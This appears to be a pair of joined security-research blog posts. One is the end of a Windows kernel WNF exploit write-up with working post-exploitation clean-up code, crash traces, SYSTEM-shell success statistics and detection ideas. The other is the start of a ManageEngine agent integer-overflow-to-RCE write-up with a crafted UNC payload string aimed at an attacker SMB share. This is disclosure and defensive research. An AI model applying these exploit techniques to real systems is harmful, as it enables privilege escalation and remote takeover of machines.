13 00000055`8b8ffb28 00007ff9`165d26ee : 00000000`00000000 00000000`00000000 00000000`00000000 00007ff9`18c5a800 : ntdll!NtWaitForSingleObject+0x14
14 00000055`8b8ffb30 00000000`00000000 : 00000000`00000000 00000000`00000000 00007ff9`18c5a800 00000000`00000000 : 0x00007ff9`165d26ee

Although we could restore this using the WNF relative read/write, as we have arbitrary read and write using the APIs, we can implement a function which uses a previously saved ScopeInstance pointer to search for the StateName of our targeted _WNF_NAME_INSTANCE object address.

Visually this looks as follows:

Some example code for this is:

/**
* This function returns back the address of a _WNF_NAME_INSTANCE looked up by its internal StateName
* It performs an _RTL_AVL_TREE tree walk against the sorted tree of _WNF_NAME_INSTANCES. 
* The tree root is at _WNF_SCOPE_INSTANCE+0x38 (NameSet)
**/
QWORD* FindStateName(unsigned __int64 StateName)
{
    QWORD* i;
    
    // _WNF_SCOPE_INSTANCE+0x38 (NameSet)
    for (i = (QWORD*)read64((char*)BackupScopeInstance+0x38); ; i = (QWORD*)read64((char*)i + 0x8))
    {

        while (1)
        {
            if (!i)
                return 0;

            // StateName is 0x18 after the TreeLinks FLINK
            QWORD CurrStateName = (QWORD)read64((char*)i + 0x18);

            if (StateName >= CurrStateName)
                break;

            i = (QWORD*)read64(i);
        }
        QWORD CurrStateName = (QWORD)read64((char*)i + 0x18);

        if (StateName <= CurrStateName)
            break; 
    }
    return (QWORD*)((QWORD*)i - 2);
}

Then once we have obtained our _WNF_NAME_INSTANCE we can then restore the original StateData pointer.

RunRef Restoration

The next crash encountered was related to the fact that we may have corrupted many RunRef from _WNF_NAME_INSTANCE‘s in the process of obtaining our unbounded _WNF_STATE_DATA. When ExReleaseRundownProtection is called and an invalid value is present, we will crash as follows:

1: kd> kv
 # Child-SP          RetAddr           : Args to Child                                                           : Call Site
00 ffffeb0f`0e9e5bf8 fffff805`2f512082 : ffffeb0f`0e9e5d60 fffff805`2f37b1d0 00000000`00000000 00000000`00000000 : nt!DbgBreakPointWithStatus
01 ffffeb0f`0e9e5c00 fffff805`2f511666 : 00000000`00000003 ffffeb0f`0e9e5d60 fffff805`2f408e90 00000000`0000003b : nt!KiBugCheckDebugBreak+0x12
02 ffffeb0f`0e9e5c60 fffff805`2f3f3fa7 : 00000000`00000103 00000000`00000000 fffff805`2f0e3838 ffffc807`cdb5e5e8 : nt!KeBugCheck2+0x946
03 ffffeb0f`0e9e6370 fffff805`2f405e69 : 00000000`0000003b 00000000`c0000005 fffff805`2f242c32 ffffeb0f`0e9e6cb0 : nt!KeBugCheckEx+0x107
04 ffffeb0f`0e9e63b0 fffff805`2f4052bc : ffffeb0f`0e9e7478 fffff805`2f0e3838 ffffeb0f`0e9e65a0 00000000`00000000 : nt!KiBugCheckDispatch+0x69
05 ffffeb0f`0e9e64f0 fffff805`2f3fcd5f : fffff805`2f405240 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceHandler+0x7c
06 ffffeb0f`0e9e6530 fffff805`2f285027 : ffffeb0f`0e9e6aa0 00000000`00000000 ffffeb0f`0e9e7b00 fffff805`2f40595f : nt!RtlpExecuteHandlerForException+0xf
07 ffffeb0f`0e9e6560 fffff805`2f283ce6 : ffffeb0f`0e9e7478 ffffeb0f`0e9e71b0 ffffeb0f`0e9e7478 ffffa300`da5eb5d8 : nt!RtlDispatchException+0x297
08 ffffeb0f`0e9e6c80 fffff805`2f405fac : ffff521f`0e9e8ad8 ffffeb0f`0e9e7560 00000000`00000000 00000000`00000000 : nt!KiDispatchException+0x186
09 ffffeb0f`0e9e7340 fffff805`2f401ce0 : 00000000`00000000 00000000`00000000 ffffffff`ffffffff ffffa300`daf84000 : nt!KiExceptionDispatch+0x12c
0a ffffeb0f`0e9e7520 fffff805`2f242c32 : ffffc807`ce062a50 fffff805`2f2df0dd ffffc807`ce062400 ffffa300`da5eb5d8 : nt!KiGeneralProtectionFault+0x320 (TrapFrame @ ffffeb0f`0e9e7520)
0b ffffeb0f`0e9e76b0 fffff805`2f2e8664 : 00000000`00000006 ffffa300`d449d8a0 ffffa300`da5eb5d8 ffffa300`db013360 : nt!ExfReleaseRundownProtection+0x32
0c ffffeb0f`0e9e76e0 fffff805`2f658318 : ffffffff`00000000 ffffa300`00000000 ffffc807`ce062a50 ffffa300`00000000 : nt!ExReleaseRundownProtection+0x24
0d ffffeb0f`0e9e7710 fffff805`2f846003 : ffffffff`ffffffff ffffa300`db013360 ffffa300`da5eb5a0 00000000`00000000 : nt!ExpWnfDeleteNameInstance+0x1dc
0e ffffeb0f`0e9e7760 fffff805`2f70553e : 00000000`00000000 ffffeb0f`0e9e7990 00000000`00000000 00000000`00000000 : nt!ExpWnfDeleteProcessContext+0x140a9b
0f ffffeb0f`0e9e77a0 fffff805`2f69ea7f : ffffc807`ce0700c0 ffffa300`d2c506a0 ffffeb0f`0e9e7990 00000000`00000000 : nt!ExWnfExitProcess+0x32
10 ffffeb0f`0e9e77d0 fffff805`2f5f4558 : 00000000`c000013a 00000000`00000001 ffffeb0f`0e9e79e0 000000f1`f98db000 : nt!PspExitThread+0x5eb
11 ffffeb0f`0e9e78d0 fffff805`2f2e6ca7 : 00000000`00000000 00000000`00000000 00000000`00000000 fffff805`2f2f0ee6 : nt!KiSchedulerApcTerminate+0x38
12 ffffeb0f`0e9e7910 fffff805`2f3f8440 : 00000000`00000000 ffffeb0f`0e9e79c0 ffffeb0f`0e9e7b80 ffffffff`00000000 : nt!KiDeliverApc+0x487
13 ffffeb0f`0e9e79c0 fffff805`2f40595f : ffffc807`ce062400 0000020b`04f64b90 00000000`00000000 00000000`00000000 : nt!KiInitiateUserApc+0x70
14 ffffeb0f`0e9e7b00 00007ff9`8314be44 : 00007ff9`80aa26ee 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceExit+0x9f (TrapFrame @ ffffeb0f`0e9e7b00)
15 000000f1`f973f678 00007ff9`80aa26ee : 00000000`00000000 00000000`00000000 00000000`00000000 00007ff9`830fa800 : ntdll!NtWaitForSingleObject+0x14
16 000000f1`f973f680 00000000`00000000 : 00000000`00000000 00000000`00000000 00007ff9`830fa800 00000000`00000000 : 0x00007ff9`80aa26ee

To restore these correctly we need to think about how these objects fit together in memory and how to obtain a full list of all _WNF_NAME_INSTANCES which could possibly be corrupt.

Within _EPROCESS we have a member WnfContext which is a pointer to a _WNF_PROCESS_CONTEXT.

This looks as follows:

nt!_WNF_PROCESS_CONTEXT
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 Process          : Ptr64 _EPROCESS
   +0x010 WnfProcessesListEntry : _LIST_ENTRY
   +0x020 ImplicitScopeInstances : [3] Ptr64 Void
   +0x038 TemporaryNamesListLock : _WNF_LOCK
   +0x040 TemporaryNamesListHead : _LIST_ENTRY
   +0x050 ProcessSubscriptionListLock : _WNF_LOCK
   +0x058 ProcessSubscriptionListHead : _LIST_ENTRY
   +0x068 DeliveryPendingListLock : _WNF_LOCK
   +0x070 DeliveryPendingListHead : _LIST_ENTRY
   +0x080 NotificationEvent : Ptr64 _KEVENT

As you can see there is a member TemporaryNamesListHead which is a linked list of the addresses of the TemporaryNamesListHead within the _WNF_NAME_INSTANCE.

Therefore, we can calculate the address of each of the _WNF_NAME_INSTANCES by iterating through the linked list using our arbitrary read primitives.

We can then determine if the Header or RunRef has been corrupted and restore to a sane value which does not cause a BSOD (i.e. 0).

An example of this is:

/**
* This function starts from the EPROCESS WnfContext which points at a _WNF_PROCESS_CONTEXT
* The _WNF_PROCESS_CONTEXT contains a TemporaryNamesListHead at 0x40 offset. 
* This linked list is then traversed to locate all _WNF_NAME_INSTANCES and the header and RunRef fixed up.
**/
void FindCorruptedRunRefs(LPVOID wnf_process_context_ptr)
{

    // +0x040 TemporaryNamesListHead : _LIST_ENTRY
    LPVOID first = read64((char*)wnf_process_context_ptr + 0x40);
    LPVOID ptr; 

    for (ptr = read64(read64((char*)wnf_process_context_ptr + 0x40)); ; ptr = read64(ptr))
    {
        if (ptr == first) return;

        // +0x088 TemporaryNameListEntry : _LIST_ENTRY
        QWORD* nameinstance = (QWORD*)ptr - 17;

        QWORD header = (QWORD)read64(nameinstance);
        
        if (header != 0x0000000000A80903)
        {
            // Fix the header up.
            write64(nameinstance, 0x0000000000A80903);
            // Fix the RunRef up.
            write64((char*)nameinstance + 0x8, 0);
        }
    }
}

NTOSKRNL Base Address

Whilst this isn’t actually needed by the exploit, I had the need to obtain NTOSKRNL base address to speed up some examinations and debugging of the segment heap. With access to the EPROCESS/KPROCESS or ETHREAD/KTHREAD, then the NTOSKRNL base address can be obtained from the kernel stack. By putting a newly created thread into the wait state, we can then walk the kernel stack for that thread and obtain the return address of a known function. Using this and a fixed offset we can calculate the NTOSKRNL base address. A similar technique was used within KernelForge.

The following output shows the thread whilst in the wait state:

0: kd> !thread ffffbc037834b080
THREAD ffffbc037834b080  Cid 1ed8.1f54  Teb: 000000537ff92000 Win32Thread: 0000000000000000 WAIT: (UserRequest) UserMode Non-Alertable
    ffffbc037d7f7a60  SynchronizationEvent
Not impersonating
DeviceMap                 ffff988cca61adf0
Owning Process            ffffbc037d8a4340       Image:         amberzebra.exe
Attached Process          N/A            Image:         N/A
Wait Start TickCount      3234           Ticks: 542 (0:00:00:08.468)
Context Switch Count      4              IdealProcessor: 1             
UserTime                  00:00:00.000
KernelTime                00:00:00.000
Win32 Start Address 0x00007ff6e77b1710
Stack Init ffffd288fe699c90 Current ffffd288fe6996a0
Base ffffd288fe69a000 Limit ffffd288fe694000 Call 0000000000000000
Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP          RetAddr           : Args to Child                                                           : Call Site
ffffd288`fe6996e0 fffff804`818e4540 : fffff804`7d17d180 00000000`ffffffff ffffd288`fe699860 ffffd288`fe699a20 : nt!KiSwapContext+0x76
ffffd288`fe699820 fffff804`818e3a6f : 00000000`00000000 00000000`00000001 ffffd288`fe6999e0 00000000`00000000 : nt!KiSwapThread+0x500
ffffd288`fe6998d0 fffff804`818e3313 : 00000000`00000000 fffff804`00000000 ffffbc03`7c41d500 ffffbc03`7834b1c0 : nt!KiCommitThreadWait+0x14f
ffffd288`fe699970 fffff804`81cd6261 : ffffbc03`7d7f7a60 00000000`00000006 00000000`00000001 00000000`00000000 : nt!KeWaitForSingleObject+0x233
ffffd288`fe699a60 fffff804`81cd630a : ffffbc03`7834b080 00000000`00000000 00000000`00000000 00000000`00000000 : nt!ObWaitForSingleObject+0x91
ffffd288`fe699ac0 fffff804`81a058b5 : ffffbc03`7834b080 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtWaitForSingleObject+0x6a
ffffd288`fe699b00 00007ffc`c0babe44 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffd288`fe699b00)
00000053`003ffc68 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!NtWaitForSingleObject+0x14

Exploit Testing and Statistics

As there are some elements of instability and non-deterministic elements of this exploit, then an exploit testing framework was developed to determine the effectiveness across multiple runs and on multiple different supported platforms and by varying the exploit parameters. Whilst this lab environment is not fully representative of a long-running operating system with potentially other third party drivers etc installed and a more noisy kernel pool, it gives some indication of this approach is feasible and also feeds into possible detection mechanisms.

The key variables which can be modified with this exploit are:

Spray size
Post-exploitation choices

All these are measured over 100 iterations of the exploit (over 5 runs) for a timeout duration of 15 seconds (i.e. a BSOD did not occur within 15 seconds of an execution of the exploit).

SYSTEM shells – Number of times a SYSTEM shell was launched.

Total LFH Writes – For all 100 runs of the exploit, how many corruptions were triggered.

Avg LFH Writes – Average number of LFH overflows needed to obtain a SYSTEM shell.

Failed after 32 – How many times the exploit failed to overflow an adjacent object of the required target type, by reaching the max number of overflow attempts. 32 was chosen a semi-arbitrary value based on empirical testing and the blocks in the BlockBitmap for the LFH being scanned by groups of 32 blocks.

BSODs on exec – Number of times the exploit BSOD the box on execution.

Unmapped Read – Number of times the relative read reaches unmapped memory (ExpWnfReadStateData) – included in the BSOD on exec count above.

Spray Size Variation

The following statistics show runs when varying the spray size.

Spray size 3000

Result	Run 1	Run 2	Run 3	Run 4	Run 5	Avg
SYSTEM shells	85	82	76	75	75	78
Total LFH writes	708	726	707	678	624	688
Avg LFH writes	8	8	9	9	8	8
Failed after 32	1	3	2	1	1	2
BSODs on exec	14	15	22	24	24	20
Unmapped Read	4	5	8	6	10	7

Spray size 6000

Result	Run 1	Run 2	Run 3	Run 4	Run 5	Avg
SYSTEM shells	84	80	78	84	79	81
Total LFH writes	674	643	696	762	706	696
Avg LFH writes	8	8	9	9	8	8
Failed after 32	2	4	3	3	4	3
BSODs on exec	14	16	19	13	17	16
Unmapped Read	2	4	4	5	4	4

Spray size 10000

Result	Run 1	Run 2	Run 3	Run 4	Run 5	Avg
SYSTEM shells	84	85	87	85	86	85
Total LFH writes	805	714	761	688	694	732
Avg LFG writes	9	8	8	8	8	8
Failed after 32	3	5	3	3	3	3
BSODs on exec	13	10	10	12	11	11
Unmapped Read	1	0	1	1	0	1

Spray size 20000

Result	Run 1	Run 2	Run 3	Run 4	Run 5	Avg
SYSTEM shells	89	90	94	90	90	91
Total LFH writes	624	763	657	762	650	691
Avg LFG writes	7	8	7	8	7	7
Failed after 32	3	2	1	2	2	2
BSODs on exec	8	8	5	8	8	7
Unmapped Read	0	0	0	0	1	0

From this was can see that increasing the spray size leads to a much decreased chance of hitting an unmapped read (due to the page not being mapped) and thus reducing the number of BSODs.

On average, the number of overflows needed to obtain the correct memory layout stayed roughly the same regardless of spray size.

Post Exploitation Method Variation

I also experimented with the post exploitation method used (token stealing vs modifying the existing token). The reason for this is that performing the token stealing method there are more kernel reads/writes and a longer time duration between reverting PreviousMode.

20000 spray size

With all the _SEP_TOKEN_PRIVILEGES enabled:

Result	Run 1	Run 2	Run 3	Run 4	Run 5	Avg
PRIV shells	94	92	93	92	89	92
Total LFH writes	939	825	825	788	724	820
Avg LFG writes	9	8	8	8	8	8
Failed after 32	2	2	1	2	0	1
BSODs on exec	4	6	6	6	11	6
Unmapped Read	0	1	1	2	2	1

Therefore, there is only negligible difference these two methods.

Detection

After all of this is there anything we have learned which could help defenders?

Well firstly there is a patch out for this vulnerability since the 8th of June 2021. If your reading this and the patch is not applied, then there are obviously bigger problems with the patch management lifecycle to focus on

However, there are some engineering insights which can be gained from this and in general detecting memory corruption exploits within the wild. I will focus specifically on the vulnerability itself and this exploit, rather than the more generic post exploitation technique detection (token stealing etc) which have been covered in many online articles. As I never had access to the in the wild exploit, these detection mechanisms may not be useful for that scenario. Regardless, this research should allow security researchers a greater understanding in this area.

The main artifacts from this exploit are:

NTFS Extended Attributes being created and queried.
WNF objects being created (as part of the spray)
Failed exploit attempts leading to BSODs

NTFS Extended Attributes

Firstly, examining the ETW framework for Windows, the provider Microsoft-Windows-Kernel-File was found to expose "SetEa" and "QueryEa" events.

This can be captured as part of an ETW trace:

As this vulnerability can be exploited a low integrity (and thus from a sandbox), then the detection mechanisms would vary based on if an attacker had local code execution or chained it together with a browser exploit.

One idea for endpoint detection and response (EDR) based detection would be that a browser render process executing both of these actions (in the case of using this exploit to break out of a browser sandbox) would warrant deeper investigation. For example, whilst loading a new tab and web page, the browser process "MicrosoftEdge.exe" triggers these events legitimately under normal operation, whereas the sandboxed renderer process "MicrosoftEdgeCP.exe" does not. Chrome while loading a new tab and web page did not trigger either of the events too. I didn’t explore too deeply if there were any render operations which could trigger this non-maliciously but provides a place where defenders can explore further.

WNF Operations

The second area investigated was to determine if there were any ETW events produced by WNF based operations. Looking through the "Microsoft-Windows-Kernel-*" providers I could not find any related events which would help in this area. Therefore, detecting the spray through any ETW logging of WNF operations did not seem feasible. This was expected due to the WNF subsystem not being intended for use by non-MS code.

Crash Dump Telemetry

Crash Dumps are a very good way to detect unreliable exploitation techniques or if an exploit developer has inadvertently left their development system connected to a network. MS08-067 is a well known example of Microsoft using this to identify an 0day from their WER telemetry. This was found by looking for shellcode, however, certain crashes are pretty suspicious when coming from production releases. Apple also seem to have added telemetry to iMessage for suspicious crashes too.

In the case of this specific vulnerability when being exploited with WNF, there is a slim chance (approx. <5%) that the following BSOD can occur which could act a detection artefact:

```
Child-SP          RetAddr           Call Site
ffff880f`6b3b7d18 fffff802`1e112082 nt!DbgBreakPointWithStatus
ffff880f`6b3b7d20 fffff802`1e111666 nt!KiBugCheckDebugBreak+0x12
ffff880f`6b3b7d80 fffff802`1dff3fa7 nt!KeBugCheck2+0x946
ffff880f`6b3b8490 fffff802`1e0869d9 nt!KeBugCheckEx+0x107
ffff880f`6b3b84d0 fffff802`1deeeb80 nt!MiSystemFault+0x13fda9
ffff880f`6b3b85d0 fffff802`1e00205e nt!MmAccessFault+0x400
ffff880f`6b3b8770 fffff802`1e006ec0 nt!KiPageFault+0x35e
ffff880f`6b3b8908 fffff802`1e218528 nt!memcpy+0x100
ffff880f`6b3b8910 fffff802`1e217a97 nt!ExpWnfReadStateData+0xa4
ffff880f`6b3b8980 fffff802`1e0058b5 nt!NtQueryWnfStateData+0x2d7
ffff880f`6b3b8a90 00007ffe`e828ea14 nt!KiSystemServiceCopyEnd+0x25
00000082`054ff968 00007ff6`e0322948 0x00007ffe`e828ea14
00000082`054ff970 0000019a`d26b2190 0x00007ff6`e0322948
00000082`054ff978 00000082`054fe94e 0x0000019a`d26b2190
00000082`054ff980 00000000`00000095 0x00000082`054fe94e
00000082`054ff988 00000000`000000a0 0x95
00000082`054ff990 0000019a`d26b71e0 0xa0
00000082`054ff998 00000082`054ff9b4 0x0000019a`d26b71e0
00000082`054ff9a0 00000000`00000000 0x00000082`054ff9b4
```

Under normal operation you would not expect a memcpy operation to fault accessing unmapped memory when triggered by the WNF subsystem. Whilst this telemetry might lead to attack attempts being discovered prior to an attacker obtaining code execution. Once kernel code execution has been gained or SYSTEM, they may just disable the telemetry or sanitise it afterwards – especially in cases where there could be system instability post exploitation. Windows 11 looks to have added additional ETW logging with these policy settings to determine scenarios when this is modified:

Windows 11 ETW events.

Conclusion

This article demonstrates some of the further lengths an exploit developer needs to go to achieve more reliable and stable code execution beyond a simple POC.

At this point we now have an exploit which is much more succesful and less likely to cause instability on the target system than a simple POC. However, we can only get about 90%~ success rate due to the techniques used. This seems to be about the limit with this approach and without using alternative exploit primitives. The article also gives some examples of potential ways to identify exploitation of this vulnerability and detection of memory corruption exploits in general.

Acknowledgements

Boris Larin, for discovering this 0day being exploited within the wild and the initial write-up.

Yan ZiShuang, for performing parallel research into exploitation of this vuln and blogging about it.

Alex Ionescu and Gabrielle Viala for the initial documentation of WNF.

Corentin Bayet, Paul Fariello, Yarden Shafir, Angelboy, Mark Yason for publishing their research into the Windows 10 Segment Pool/Heap.

Aaron Adams and Cedric Halbronn for doing multiple QA’s and discussions around this research.

Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082)

Tenable TechBlog - Medium

David Wells

17 August 2021 at 13:02

Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082)

A couple months back, Chris Lyne and I had a look at ManageEngine ServiceDesk Plus. This product consists of a server / agent model in which agents provide updates on machine status back to the Manage Engine server. Chris ended up finding an unauth XSS-to-RCE chain in the server component which you can read here: https://medium.com/tenable-techblog/stored-xss-to-rce-chain-as-system-in-manageengine-servicedesk-plus-493c10f3e444, allowing an attacker to fully compromise the server with SYSTEM privileges.

The blog here will go over the exploitation of an integer overflow that I found in the agents themselves (CVE-2021–20082) called Asset Explorer Agent. This exploit could allow an attacker to pivot the network once the ManageEngine server is compromised. Alternatively, this could be exploited by spoofing the ManageEngine server IP on the network and triggering this vulnerability as we will touch on later. While this PoC is not super reliable, it has been proven to work after several tries on a Windows 10 Pro 20H2 box (see below). I believe that further work on heap grooming could increase exploitation odds.

Linux machine (left), remotely exploiting integer overflow in ManageEngine Asset Explorer running on Windows 10 (right) and popping up a “whoami” dialog.

Attack Vector

The ManageEngine Windows agent executes as a SYSTEM service and listens on the network for commands from its ManageEngine server. While TLS is used for these requests, the agent never validates the certificate, so anyone on the network is able to perform this TLS handshake and send an unauthorized command to the agent. In order for the agent to run the command however, the agent expects to receive an authtoken, which it echos back to its configured server IP address for final approval. Only then will the agent carry out the command. This presents a small problem since that configured IP address is not ours, and instead asks the real Manage Engine server to approve our sent authtoken, which is always going to be denied.

There is a way an attacker can exploit this design however and that’s by spoofing their IP on the network to be the Manage Engine server. I mentioned certs are not validated which allows an attacker to send and receive requests without an issue. This allows full control over the authtoken approval step, resulting in the agent running any arbitrary agent command from an attacker.

From here, you may think there is a command that can remotely run tasks or execute code on agents. Unfortunately, this was not the case, as the agent is very lightweight and supports a limited amount of features, none of which allowed for logical exploitation. This forced me to look into memory corruption in order to gain remote code execution through this vector. From reverse engineering the agents, I found a couple of small memory handling issues, such as leaks and heap overflow with unicode data, but nothing that led me to RCE.

Integer Overflow

When the agent receives final confirmation from its server, it is in the form of a POST request from the Manage Engine server. Since we are assuming the attacker has been able to insert themselves as a fake Manage Engine server or have compromised a real Manage Engine server, this allows them to craft and send any POST response to this agent.

When the agent processes this POST request, WINAPIs for HTTP handling are used. One of which is HttpQueryInfoW, which is used to query the incoming POST request for its “Content-Size” field. This Content-Size field is then used as a size parameter in order to allocate memory on the heap to copy over the POST payload data.

There is some integer arithmetic performed between receiving the Content-Size field and actually using this size to allocate heap memory. This is where we can exploit an integer overflow.

Here you can see the Content-Size is incremented by one, multiplied by four, and finally incremented by an extra two bytes. This is a 32-bit agent, using 32-bit integers, which means if we supply a Content-Size field the size of UINT32_MAX/4, we should be able to overflow the integer to wrap back around to size 2 when passed to calloc. Once this allocation of only two bytes is made on the heap, the following API InternetReadFile, will copy over our POST payload data to the destination buffer until all its POST data contents are read. If our POST data is larger than two bytes, then that data will be copied beyond the two byte buffer resulting in heap overflow.

Things are looking really good here because we not only can control the size of the heap overflow (tailoring our post data size to overwrite whatever amount of heap memory), but we also can write non-printable characters with this overflow, which is always good for exploiting write conditions.

No ASLR

Did I mention these agents don’t support ASLR? Yeah, they are compiled with no relocation table, which means even if Windows 10 tries to force ASLR, it can’t and defaults the executable base to the PE ImageBase. At this point, exploitation was sounding too easy, but quickly I found…it wasn’t.

Creating a Write Primitive

I can overwrite a controlled amount of arbitrary data on the heap now, but how do I write something and somewhere…interesting? This needs to be done without crashing the agent. From here, I looked for pointers or interesting data on the heap that I could overwrite. Unfortunately, this agent’s functionality is quite small and there were no object or function pointers or interesting strings on the heap for me to overwrite.

In order to do anything interesting, I was going to need a write condition outside the boundaries of this heap segment. For this, I was able to craft a Write-AlmostWhat-Where by abusing heap cell pointers used by the heap manager. Asset Explorer contains Microsoft’s CRT heap library for managing the heap. The implementation uses a double-linked list to keep track of allocated cells, and generally looks something like this:

Just like when any linked list is altered (in this case via a heap free or heap malloc), the next and prev pointers must be readjusted after insertion or deletion of a node (seen below).

For our attack we will be focusing on exploiting the free logic which is found in the Microsoft Free_dbg API. When a heap cell is freed, it removes the target node and remerges the neighboring nodes. Below is the Free_dbg function from Microsoft library, which uses _CrtMemBlockHeader for its heap cells. The red blocks are the remerging logic for these _CrtMemBlockHeader nodes in the linked list.

This means if we overwrite a _CrtMemBlockHeader* prev pointer with an arbitrary address (ideally an address outside of this cursed memory segment we are stuck in), then upon that heap cell being freed, the contents of this arbitrary *prev address will have the _CrtMemBlockHeader* next pointer written to where *prev points to. It gets better…we can also overflow into the _CrtMemBlockHeader* next pointer as well, allowing us to control what * next is, thus creating an arbitrary write condition for us — one DWORD at a time.

There is a small catch, however. The _CrtMemBlockHeader* next and _CrtMemBlockHeader* prev are both dereferenced and written to in this remerging logic, which means I can’t just overwrite *prev pointer with any arbitrary data I want, as this must also be a valid pointer in writable memory location itself, since its contents will also be written to during the Free_dbg function. This means I can only write pointers to places in memory and these pointers must point to writable memory themselves. This prevents me from writing executable memory pointers (as that points to RX protected memory) as well as preventing me from writing pointers to non-existent memory (as the dereference step in Free_dbg will cause access violation). This proved to be very constraining for my exploitation.

Data-Only Attack

Data-only attacks are getting more popular for exploiting memory corruption bugs, and I’m definitely going to opt for that here. This binary has no ASLR to worry about, so browsing the .data section of the executable and finding an interesting global variable to overwrite is the best step. When searching for these, many of the global variables point to strings, which seem cool — but remember, it will be very hard to abuse my write primitive to overwrite string data, since the string data I would want to write must represent a pointer to valid and writable memory in the program. This limits me to searching for an interesting global variable pointer to overwrite.

Step 1 : Overwrite the Current Working Directory

I found a great candidate to leverage this pointer write primitive. It is a global variable pointer in Asset Explorer’s .data section that points to a unicode string that dictates the current working directory of the Manage Engine agent.

We need to know how this is used in order to abuse it correctly, and a few XREFs later, I found this string pointer is dereferenced and passed to SetCurrentDirectory whenever a “NEWSCAN” request is sent to the agent (which we can easily do as a remote attacker). This call dynamically changes the current working directory for the remote Asset Explorer service which is what I shoot for in developing an exploit. Even better, the NEWSCAN request then calls “CreateProcess” to execute a .bat file from the current working directory. If we can modify this current working directory to point to a remote SMB share we own, and place a malicious .bat file on our SMB share with the same name, then Asset Explorer will try to execute this .bat file off our SMB share instead of the local one, resulting in RCE. All we need to do is modify this pointer so that it points to a malicious remote SMB path we own, trigger a NEWSCAN request so that the current working directory is changed, and make it execute our .bat file.

Since ASLR is not enabled, I know what this pointer address will be, so we just need to trigger our heap overflow to exploit my pointer write condition with Free_dbg to replace this pointer.

To effectively change this current working directory, you would need to:

1. Trigger the heap overflow to overwrite the *next and *prev pointers of a heap cell that will be freed (medium)

2. Overwrite the *next pointer with the address of this current working directory global variable as it will be the destination for our write primitive (easy)

3. Overwrite the *prev pointer with a pointer that points to a unicode string of our SMB share path (hard).

4. Trigger new scan request to change current working directory and execute .bat file (easy)

For step 1, this ideally would require some grooming, so we can trigger our overflow once our cell is flush against another heap cell and carefully overwrite its _CrtMemBlockHeader. Unfortunately my heap grooming attempts were not working to force allocations where I wanted. This is partially due to the limited size I was able to remotely allocate in the remote process and a large part of my limited Windows 10 heap grooming experience. Luckily, there was pretty much no penalty for failed overflow attempts since I am only overwriting the linked list pointers of heap cells and the heap manager was apparently very ok with that. With that in mind, I run my heap overflow several times and hope it writes over a particular existing heap cell with my write primitive payload. I found ~20 attempts of this overflow will usually end up working to overflow the heap cell I want.

What is the heap cell I want? Well, I need it to be a heap cell which will be freed because that’s the only way to trigger my arbitrary write. Also, I need to know where I sprayed my malicious SMB path string in heap memory, since I need to overwrite the current working directory global variable with a pointer to my string. Without knowing my own string address, I have no idea what to write. Luckily I found a way to get around this without needing an infoleak.

Bypassing the Need for Infoleak

In my PoC I am initially sending a string of to the agent:

XXXXXXXX1#X#X#XXXXXXXX3#XXXXXXXX2#//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//UNC//127.0.0.1/a/

Asset Explorer will parse this string out once received and allocate a unicode string for each substring delimited by “#” symbols. Since the heap is allocated in a doubly linked list fashion, the order of allocations here will be sequentially appended in the linked list. So, what I need to do is overflow into the heap cell headers for the “XXXXXXXX2” string with understanding that its _CrtMemBlockHeader* next pointer will point to the next heap cell to be allocated, which is always the //.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//UNC//127.0.0.1/a/ string.

If we overwrite the _CrtMemBlockHeader* prev with the .data address of the current working directory path, and only overwrite the first (lowest order) byte of the _CrtMemBlockHeader* prev pointer then we won’t need an info leak. Since the upper three bytes dictate the SMB string’s general memory address, we just need to offset the last byte so that it will point to the actual string data rather than the _CrtMemBlockHeader structure it currently points to. This is why I choose to overwrite the lowest order byte with “0xf8”, so guarantee max offset from _CrtMemBlockHeader.

It’s beneficial if we can craft an SMB path string that contains pre-pended nonsense characters to it (similar to nop-sled but for file path). This will give us greater probability that our 0xf8 offset points somewhere in our SMB path string that allows SetCurrentDirectory to interpret it as a valid path with prepended nonsense characters (ie: .\.\.\.\.\<path>). Unfortunately, .\.\.\.\ wouldn’t work for SMB share, so with thanks to Chris Lyne, he was able to craft a nice padded SMB path like this for me:

//.//.//.//.//.//UNC//<ip_address>/a/

This will allow the path to be simply treated as “//<ip_address>/a/”. If we provide enough “//.” in front of our path, we will have about a ⅓ chance of this hitting our sled properly when overwriting the lowest *prev byte 0xf8. Much better odds than if I used a simple straight forward SMB string.

I ran my exploit, witnessed it overwrite the current working directory, and then saw Asset Explorer attempt to execute our .bat file off our remote SMB share…but it wasn’t working. It was that day when I learned .bat files cannot be executed off remote SMB shares with CreateProcess.

Step 2: Hijacking Code Flow

I didn’t come this far to just give up, so we need to look at a different technique to turn our current working directory modification into remote code execution. Libraries (.dll files) do not have this restriction, so I search for places where Asset Explorer might try to load a library. This is a tough ask, because it has to be a dynamic loading of a library (not super common for applications to do) that I can trigger, and also — it cannot be a known dll (ie: kernel32.dll, rpcrt4.dll, etc), since search order for these .dlls will not bother with the application’s current working directory, but rather prioritize loading from a Windows directory. For this I need to find a way to trigger the agent to load an unknown dll.

After searching, I found a function called GetPdbDll in the agent where it will attempt to dynamically load “Mspdb80.dll”, a debugging dll used for RTC (runtime checks). This is an unknown dll so it should attempt to load it off it’s current working directory. Ok, so how do I call this thing?

Well, you can’t… I couldn’t find any XREFs to code flow that could end up calling this function, I assumed it was left in stubs from the compiler, as I couldn’t even find indirect calls that might lead code flow here. I will have to abandon my data-only attack plan here and attempt to hijack code flow for this last part.

